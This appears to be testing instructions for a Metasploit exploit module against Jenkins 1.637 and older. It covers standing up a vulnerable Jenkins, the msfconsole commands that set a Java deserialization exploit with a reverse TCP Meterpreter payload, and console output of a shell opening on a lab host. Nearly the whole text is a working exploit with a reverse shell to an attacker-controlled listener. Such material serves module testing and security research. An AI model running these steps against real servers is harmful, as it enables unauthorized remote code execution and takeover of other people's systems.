Stand up a Jenkins server, version 1.637 or lower:
wget http://mirrors.jenkins-ci.org/war/1.637/jenkins.war
java -jar jenkins.war
Run the following exploit in msfconsole:
use exploit/linux/misc/jenkins_java_deserialize
set payload java/meterpreter/reverse_tcp
set RHOST 127.0.0.1
set RPORT 8080
set LHOST <UR-HOST>
set LPORT 4444
exploit
Ensure you get a shell:
msf exploit(jenkins_java_deserialize) > show options
Module options (exploit/linux/misc/jenkins_java_deserialize):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.104    yes       The target address
   RPORT  8080             yes       The target port
   TEMP   /tmp             yes       Folder to write the payload to

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.108    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Jenkins 1.637

msf exploit(jenkins_java_deserialize) > run
[*] Started reverse handler on 192.168.1.108:4444
[*] 192.168.1.104:8080 - Sending headers...
[*] 192.168.1.104:8080 - Sending payload length: 13198
[*] 192.168.1.104:8080 - Sending headers...
[*] 192.168.1.104:8080 - Sending payload length: 6770
[*] Sending stage (45741 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.104:56753) at 2015-12-12 05:00:25 +0000
[+] Deleted /tmp/WUoykkU.jar
meterpreter > sysinfo
Computer : lab
OS : Linux 4.0.0-kali1-686-pae (i386)
Meterpreter : java/java
meterpreter >